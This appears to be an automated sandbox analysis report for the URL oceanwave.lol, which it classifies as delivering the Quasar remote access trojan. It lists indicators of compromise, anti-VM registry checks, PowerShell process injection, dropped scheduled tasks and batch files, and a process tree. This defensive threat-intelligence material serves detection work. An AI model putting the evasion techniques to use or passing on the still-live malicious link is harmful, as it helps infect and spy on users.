quasar | hxxps://oceanwave[.]lol/

Analysis

max time kernel
65s
max time network
70s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04/01/2025, 13:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://oceanwave.lol/

Score

10^/10

quasar discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

encryption_key
6F38862AF940DB0B877E1A5C024641D617D7FAB6
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/3200-2715-0x00000167C9910000-0x00000167CA094000-memory.dmp	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5536 created 3200	5536	WerFault.exe	150

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 5268 created 612	5268	powershell.exe	5
PID 4824 created 5268	4824	svchost.exe	131
PID 3200 created 612	3200	powershell.exe	5
PID 4824 created 3200	4824	svchost.exe	150
PID 4824 created 3200	4824	svchost.exe	150

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5268	powershell.exe
3200	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$nya-6phH16Ma	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 21 IoCs

pid	Process
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe
3200	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5268 set thread context of 5480	5268	powershell.exe	132
PID 3200 set thread context of 4624	3200	powershell.exe	152

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$rbx-onimai2	powershell.exe
File created	C:\Windows\$rbx-onimai2\$rbx-CO2.bat	cmd.exe
File opened for modification	C:\Windows\$nya-onimai2	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02qvlatoyxoebikc\DeviceId = "<Data DAInvalidationTime=\"1735998999\"><User username=\"02QVLATOYXOEBIKC\"><HardwareInfo BoundTime=\"1735998999\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02qvlatoyxoebikc\DeviceId = "<Data DAInvalidationTime=\"1735998999\"><User username=\"02QVLATOYXOEBIKC\"><HardwareInfo BoundTime=\"1735999052\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4148	msedge.exe
4148	msedge.exe
3452	msedge.exe
3452	msedge.exe
780	identity_helper.exe
780	identity_helper.exe
1176	msedge.exe
1176	msedge.exe
5268	powershell.exe
5268	powershell.exe
5268	powershell.exe
5268	powershell.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe
5480	dllhost.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5268	powershell.exe
Token: SeDebugPrivilege	5480	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2304	svchost.exe
Token: SeIncreaseQuotaPrivilege	2304	svchost.exe
Token: SeSecurityPrivilege	2304	svchost.exe
Token: SeTakeOwnershipPrivilege	2304	svchost.exe
Token: SeLoadDriverPrivilege	2304	svchost.exe
Token: SeSystemtimePrivilege	2304	svchost.exe
Token: SeBackupPrivilege	2304	svchost.exe
Token: SeRestorePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	2304	svchost.exe
Token: SeSystemEnvironmentPrivilege	2304	svchost.exe
Token: SeUndockPrivilege	2304	svchost.exe
Token: SeManageVolumePrivilege	2304	svchost.exe
Token: SeShutdownPrivilege	3416	Explorer.EXE
Token: SeCreatePagefilePrivilege	3416	Explorer.EXE
Token: SeShutdownPrivilege	3416	Explorer.EXE
Token: SeCreatePagefilePrivilege	3416	Explorer.EXE
Token: SeShutdownPrivilege	3416	Explorer.EXE
Token: SeCreatePagefilePrivilege	3416	Explorer.EXE
Token: SeShutdownPrivilege	3416	Explorer.EXE
Token: SeCreatePagefilePrivilege	3416	Explorer.EXE
Token: SeShutdownPrivilege	3416	Explorer.EXE
Token: SeCreatePagefilePrivilege	3416	Explorer.EXE
Token: SeShutdownPrivilege	332	dwm.exe
Token: SeCreatePagefilePrivilege	332	dwm.exe
Token: SeShutdownPrivilege	3416	Explorer.EXE
Token: SeCreatePagefilePrivilege	3416	Explorer.EXE

Suspicious use of FindShellTrayWindow 39 IoCs

pid	Process
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE

Suspicious use of SendNotifyMessage 38 IoCs

pid	Process
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3452	msedge.exe
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE
3416	Explorer.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3416	Explorer.EXE
3416	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3452 wrote to memory of 3648	3452	msedge.exe	82
PID 3452 wrote to memory of 3648	3452	msedge.exe	82
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 3188	3452	msedge.exe	83
PID 3452 wrote to memory of 4148	3452	msedge.exe	84
PID 3452 wrote to memory of 4148	3452	msedge.exe	84
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85
PID 3452 wrote to memory of 452	3452	msedge.exe	85

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:332
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{2af04279-d842-4b6f-b705-a31449bae4ca}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5480
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5ac1054c-d5ce-4491-8f6d-ed4c1b46e266}
  2⤵
  PID:4624

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1156
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2692

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1552
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1932

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2008

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1780

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2676

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2908

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3292

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://oceanwave.lol/
  2⤵
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3452
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff6e146f8,0x7ffff6e14708,0x7ffff6e14718
